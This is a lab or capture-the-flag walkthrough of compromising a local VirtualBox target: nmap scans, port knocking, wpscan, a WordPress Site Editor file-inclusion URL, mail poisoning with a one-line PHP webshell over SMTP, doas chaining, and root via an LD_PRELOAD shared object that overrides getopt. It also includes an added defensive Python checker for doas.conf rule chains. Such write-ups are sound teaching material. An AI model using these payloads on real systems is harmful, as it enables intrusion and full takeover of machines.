The target machine's IP is 192.168.56.123

Port scanning

sudo nmap --min-rate 10000 -p- 192.168.56.123
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-22 09:05 UTC
Nmap scan report for 192.168.56.123 (192.168.56.123)
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp filtered smtp
80/tcp open http
MAC Address: 08:00:27:0D:43:53 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.24 seconds

sudo nmap -sT -sV -sC -O -p22,25,80 192.168.56.123
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-22 09:06 UTC
Nmap scan report for 192.168.56.123 (192.168.56.123)
Host is up (0.00045s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 2048 34:55:b2:c3:59:4e:b1:e5:dc:47:bb:73:f6:df:de:43 (RSA)
| 256 5a:c3:b8:80:53:27:8f:b4:ef:27:89:c8:e5:a6:1f:81 (ECDSA)
|_ 256 08:46:e6:ba:d3:64:31:88:e7:d3:66:94:ce:52:80:35 (ED25519)
25/tcp filtered smtp
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:0D:43:53 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.67 seconds

Getshell

The scan turned up a note.txt, which hints at knock

knock hard 7000 8000 9000

After knocking, a /blog directory appears; it is a WordPress site

The page loads very slowly; the browser's Network tab shows it is requesting the hostname "hard", so add "hard" to the hosts file

wpscan --url=http://hard/blog/ --enumerate vp,vt,tt,u

There is a user named sabine

wpscan --url=http://hard/blog/ --enumerate ap --plugins-detection aggressive --api-token=api

This reports a vulnerable plugin: Site Editor <= 1.1.1 - Local File Inclusion (LFI)

http://hard/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

The inclusion works!

Files can be included, but wp-config.php cannot be read this way.

Since port 25 is open, try sending the sabine user an email whose body is a one-line PHP webshell

nc hard 25          
220 debian ESMTP Postfix (Debian/GNU)
HELO hard
250 debian
MAIL FROM:<test>
250 2.1.0 Ok
RCPT TO: sabine
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET["shell"]) ;?>
.
250 2.0.0 Ok: queued as EE29E80ABD
QUIT
221 2.0.0 Bye

http://hard/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/sabine&shell=whoami

Command execution achieved!

Set up a reverse shell

Lateral movement

doas is also present with the SUID bit set

cat /etc/doas.conf
permit nopass www-data as sabine cmd /usr/bin/setsid
permit nopass sabine as leonard cmd /usr/bin/mutt

So www-data can run setsid as sabine

doas -u sabine /usr/bin/setsid /bin/bash
doas -u leonard /usr/bin/mutt

Once inside the mutt interface, typing "!" likewise spawns a shell session
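From the defender's side, the doas.conf above is the kind of rule chain a configuration review should surface before an attacker does. The following Python is an added example (not part of the original writeup): it parses doas.conf rules and lists every identity a given user can transitively become, so the www-data to sabine to leonard path shows up at a glance. The sample config is constructed from the two rules quoted above.

```python
import re
from collections import defaultdict, deque

# Constructed sample mirroring the two rules quoted in the writeup.
SAMPLE_DOAS_CONF = """\
permit nopass www-data as sabine cmd /usr/bin/setsid
permit nopass sabine as leonard cmd /usr/bin/mutt
"""

# doas.conf grammar subset: permit|deny [options] identity [as target] [cmd command [args ...]]
# (the setenv { ... } option is not handled and will raise).
RULE_RE = re.compile(
    r"^(?P<action>permit|deny)\s+"
    r"(?P<opts>(?:(?:nopass|persist|keepenv|nolog)\s+)*)"
    r"(?P<identity>\S+)(?:\s+as\s+(?P<target>\S+))?"
    r"(?:\s+cmd\s+(?P<cmd>\S+))?(?:\s+args\b.*)?$"
)

def parse_doas_conf(text):
    """Return one dict per rule; comments and blank lines are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            raise ValueError(f"unparsed doas rule: {line!r}")
        rule = m.groupdict()
        rule["opts"] = rule["opts"].split()
        rule["target"] = rule["target"] or "root"  # doas defaults the target to root
        rules.append(rule)
    return rules

def reachable_identities(rules, start):
    """BFS over permit rules from `start` -> {identity: [(from, to, cmd, nopass), ...]}.
    Deny rules are not modelled: doas is last-match, so a later deny can cancel a permit."""
    edges = defaultdict(list)
    for r in rules:
        if r["action"] == "permit":
            edges[r["identity"]].append((r["target"], r["cmd"] or "*", "nopass" in r["opts"]))
    chains, queue = {start: []}, deque([start])
    while queue:
        user = queue.popleft()
        for target, cmd, nopass in edges[user]:
            if target not in chains:  # first (shortest) chain to each identity wins
                chains[target] = chains[user] + [(user, target, cmd, nopass)]
                queue.append(target)
    del chains[start]
    return chains
```

Run it against a real file with `reachable_identities(parse_doas_conf(open("/etc/doas.conf").read()), "www-data")`; any web-server account that can reach a second identity deserves a second look.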

Privilege escalation

sudo -l shows that "ping" can be run without a password, and that LD_PRELOAD is kept in the environment, so we get to choose which shared library is loaded

Decompiling /usr/bin/ping in IDA shows that it calls the getopt function.

So we can write our own getopt function in pwn.c:

#include <stdlib.h>
#include <unistd.h>
/* Shadows libc's getopt(); with LD_PRELOAD kept by sudo, this copy is the one
   ping calls, so it runs with root privileges before ping parses its arguments. */
int getopt(char *s){
setuid(0);
setgid(0);
system("/bin/bash");
}
gcc -shared pwn.c -o /tmp/pwn.so
sudo -u root LD_PRELOAD=/tmp/pwn.so /usr/bin/ping 0.0.0.0

Now we are root!

Summary

This room was still fairly new territory for me: writing a webshell by combining email with file inclusion. The principle is actually much the same as the Apache log and SSH log poisoning I have run into before. As for the shared-library part of the privilege escalation, I feel I need to study Linux kernel and binary topics some more.